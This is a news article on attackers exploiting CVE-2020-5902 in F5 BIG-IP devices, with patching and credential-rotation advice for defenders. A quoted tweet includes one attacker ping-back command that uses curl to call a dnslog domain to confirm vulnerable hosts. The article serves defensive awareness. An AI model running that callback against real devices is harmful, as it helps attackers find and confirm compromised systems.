Attackers are breaching F5 BIG-IP devices, check whether you’ve been hit
Attackers are actively trying to exploit CVE-2020-5902, a critical vulnerability affecting F5 Networks‘ BIG-IP multi-purpose networking devices, to install coin-miners, IoT malware, or to scrape administrator credentials from the hacked devices.
About CVE-2020-5902
CVE-2020-5902 is a critical remote code execution vulnerability in the configuration interface (aka Traffic Management User Interface – TMUI) of BIG-IP devices used by some of the world’s biggest companies.
It was unearthed along with CVE-2020-5903, a less critical XSS vulnerability that enables running malicious JavaScript code as the logged-in user on BIG-IP devices, by Positive Technologies researcher Mikhail Klyuchnikov.
To exploit CVE-2020-5902, an attacker needs to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.
“By exploiting this vulnerability, a remote attacker with access to the BIG-IP configuration utility could, without authorization, perform remote code execution. The attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network,” the researcher noted.
“RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation. This is particularly dangerous for companies whose F5 BIG-IP web interface is listed on search engines such as Shodan. Fortunately, most companies using the product do not enable access to the interface from the internet.”
Shodan shows around 8,500 vulnerable devices available on the internet, nearly 40% of which are in the U.S.
Active exploitation
F5 Networks published security advisories for both flaws last Wednesday, just as the U.S. was looking forward to the long Independence Day weekend.
Both the company and the U.S. Cyber Command urged admins on Friday to check whether their F5 BIG-IP web interfaces were exposed on the internet and to implement the offered patches before the weekend starts.
At the time, there was no public exploit available for CVE-2020-5902, but some soon became available. A Metasploit module is also in the works.
Finally, opportunistic mass scanning for vulnerable devices started during the weekend, and exploits started being leveraged by various attackers:
As of this morning we are seeing an uptick in RCE attempts against our honeypots, using a combination of either the public Metasploit module, or similar via Python. Also a large wave of attacks coming from 🇨🇳 which do a ping back via:
curl <vulnip>.<id>.dnslog[.]cn
— Rich Warren (@buffaloverflow) July 6, 2020
What to do?
According to F5 Networks, BIG-IP networking devices are used as server load balancers, application delivery controllers, access gateways, etc. by 48 of the Fortune 50 companies. They are used by ISPs and governments.
As noted before, F5 Networks released fixed software versions last week as well as helpful risk mitigation advice if patching is impossible at this moment.
For organizations that didn’t get around to any of it, Microsoft cybersecurity pro Kevin Beaumont offers the following advice:
So people are scraping secrets (credentials) off BIG-IP boxes in an automated fashion. If you didn’t patch before the weekend I think you will need to rotate creds and check logs after patching when you’re back in work.
— Kevin Beaumont (@GossiTheDog) July 5, 2020
SANS ISC handler Dider Stevens has also provided helpful links and advice.
UPDATE (July 8, 2020, 3:42 a.m. PT):
Attackers are bypassing one of the mitigations originally provided by F5 Networks, so any organization that applied it instead of patching their F5 BIG-IP boxes should take action again and check whether their devices have been compromised in the meantime.